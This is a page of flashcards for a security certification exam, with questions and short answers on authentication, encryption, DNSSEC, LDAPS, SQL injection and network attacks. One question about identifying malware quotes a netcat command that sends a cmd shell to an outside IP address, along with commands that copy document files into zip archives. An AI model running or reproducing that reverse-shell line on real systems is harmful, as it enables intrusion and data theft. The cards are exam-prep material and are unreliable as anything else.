failed test 2

Lakukan tugas rumah & ujian kamu dengan baik sekarang menggunakan Quizwiz!

hacktivists are most are most commonly motivated by:

political gain

When sending messages using symmetric encryption, which of the following must happen FIRST?

Agree on an encryption method

A network administrator has a seprate user account with rights to domain administrator group . However, they cannot remember the password to this account and are not able to login to the server when needed. Which of the following is MOST accurate in describing the type of issue the administrator is experiencing ?

Authentication

Which of the following access management concepts is MOST closely associated with the use of a password or PIN?

Authentication

A security analyst believes an employee's workstation has been compromised. The analyst reviews the system logs but does not find any attempted logins. The analyst then runs the different command, comparing the C:\Windows\System32 directory and the installed cache directory. The analyst finds a series of files a series of files that look suspicious. One of the files contains the following commands: cmd/c%TEMP%\nc-ecmd exe 34.100.43.230 copy*doc>%TEMP%\docfiles.zip copy*xls>%TEMP%\xlsfiles.zip copy*pdf>%TEMP%\pdffiles.zip Which of the following types of malware was used?

Backdoor

A company wants to host a publicly available server that platforms the following functions: * Evaluates MX record lookup * can perform authenticated request for A and AAA records * uses RRSIG Which of the following should the company use to fulfill the above requirements ?

DNSSEC

An organization is moving it's human resources system to a cloud services provider. The company plans to continue using internal usernames and passwords with the service provider, but the security manager doesd not want the service provider to have a copy of the passwords. Which of the following options meets all of these requirements?

Federated authentication

A certificate authority takes which of the following actions in PKI?

Issues and signs all root certificates

A network administrator receives a support ticket from the security operations to implement secure access to the domain. The support ticket contains the following information: *Source 192.168.1.137 * Destination 10.113.10.8 * Protocol TCP * Ports 636 * Time-of-day restriction: none * Proxy bypass required : Yes Which of the following is being requested to be implemented?

LDAPS

A corporate wireless quest network uses an open SSID with a captive portal to authenticate guest users. Guest can obtain their portal password at the service desk. A security consultant alerts the administrator that the captive portal is easily bypassed, as long as one other wireless guest user is on the network. Which of the following attacks did the security consultant use?

MAC spoofing

An enterprise needs to be able to receive files that contain PII from many customers at different times. The data must remain encrypted during transport and while at rest. Which of the following encryption solutions would met both of these requirements?

PGP

A web site form is used to register new student at a university. The form passes the unsanitized values entered by the user and uses them to directly add the student's information to several core systems. Which of the following attacks can be used to gain further access due to this practice ?

SQL injection

Two users must encrypt and transmit large amounts of data between them. Which of the following should they use to encrypt and transmit the data ?

Symmetric algorithm

A consultant has been tasked to assess a client's network. The client reports frequent network outages. Upon viewing the spanning tree configuration, the consultant notices that an old and low-performing edge switch on the network has been elected to be the root bridge. Which of the following explains this scenario?

The switch has the lowest MAC address

A Chief Security Officer (CISO) asks the security architect to design a method for contractors to access the company's internal network securely without allowing access to systems beyond the scope of their project. Which of the following methods would BEST fit the needs of the CISO?

VDI

A security administrator is developing controls for creating audit trails and tracking if a PHI data breach is to occur. The administrator has been given the following requirements: * All access must be correlated to a user account * All user accounts must be assigned to a single individual * User access to the PHI data must be recorded * Anomalies in the PHI data access must be reported * Logs and records cannot be deleted or modified Which of the following should the administrator implement to meet the above requirements? ( select THREE)

copy logs in real time to a secured WORM drive / Implemented usage auditing and review/ Eliminate shared accounts


Set pelajaran terkait

Accounting Chapter 9-3 Petty Cash

View Set

6th Grade Geometry Classify and Measure Angles

View Set

Unit 8 - AP Computer Science - AP Classroom

View Set

Unit 2: Life/Health Insurance Underwriting QBank

View Set

buying using and disposing ch 10

View Set

Anatomy and physiology of the lactating breast

View Set